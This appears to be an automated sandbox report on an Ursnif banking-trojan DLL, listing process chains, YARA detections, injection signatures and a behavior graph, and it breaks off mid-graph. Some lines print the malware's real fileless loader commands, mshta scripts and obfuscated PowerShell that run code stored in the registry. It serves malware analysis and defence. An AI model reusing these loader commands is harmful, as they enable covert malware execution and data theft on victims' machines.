Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP"
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP"
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67D8.tmp" "c:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D21BC cpuid 1_2_017D21BC
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0799A CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_03B0799A
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D414A GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 1_2_017D414A
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D5A5A CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_017D5A5A
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D21BC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 1_2_017D21BC

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 555803 Sample: status.dll Startdate: 19/01/2022 Architecture: WINDOWS Score: 100 109 myip.opendns.com 2->109 111 222.222.67.208.in-addr.arpa 2->111 119 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->119 121 Multi AV Scanner detection for submitted file 2->121 123 Yara detected  Ursnif 2->123 125 5 other signatures 2->125 12 loaddll32.exe 2 2->12         started        15 iexplore.exe 2 84 2->15         started        signatures3 process4 signatures5 141 Writes to foreign memory regions 12->141 143 Writes or reads registry keys via WMI 12->143 145 Writes registry values via WMI 12->145 17 regsvr32.exe 1 12->17         started        21 rundll32.exe 1 1 12->21         started        23 cmd.exe 1 12->23         started        31 2 other processes 12->31 25 iexplore.exe 15->25         started        27 iexplore.exe 15->27         started        29 iexplore.exe 15->29         started        33 2 other processes 15->33 process6 dnsIp7 105 192.168.2.1 unknown unknown 17->105 113 Writes or reads registry keys via WMI 17->113 115 Writes registry values via WMI 17->115 35 mshta.exe 17->35         started        117 Writes to foreign memory regions 21->117 37 mshta.exe 21->37         started        39 control.exe 21->39         started        41 rundll32.exe 1 23->41         started        107 museumistat.bar 31.41.44.3, 49748, 49749, 49750 ASRELINKRU Russian Federation 25->107 44 powershell.exe 31->44         started        signatures8 process9 signatures10 46 powershell.exe 35->46         started        49 powershell.exe 37->49         started        51 rundll32.exe 39->51         started        127 Writes registry values via WMI 41->127 53 mshta.exe 41->53         started        129 Modifies the context of a thread in another process (thread injection) 44->129 131 Maps a DLL or memory area into another process 44->131 133 Creates a thread in another existing process (thread injection) 44->133 55 csc.exe 44->55         started        58 csc.exe 44->58         started        60 conhost.exe 44->60         started        process11 file12 62 csc.exe 46->62         started        65 conhost.exe 46->65         started        147 Modifies the context of a thread in another process (thread injection) 49->147 149 Maps a DLL or memory area into another process 49->149 151 Creates a thread in another existing process (thread injection) 49->151 67 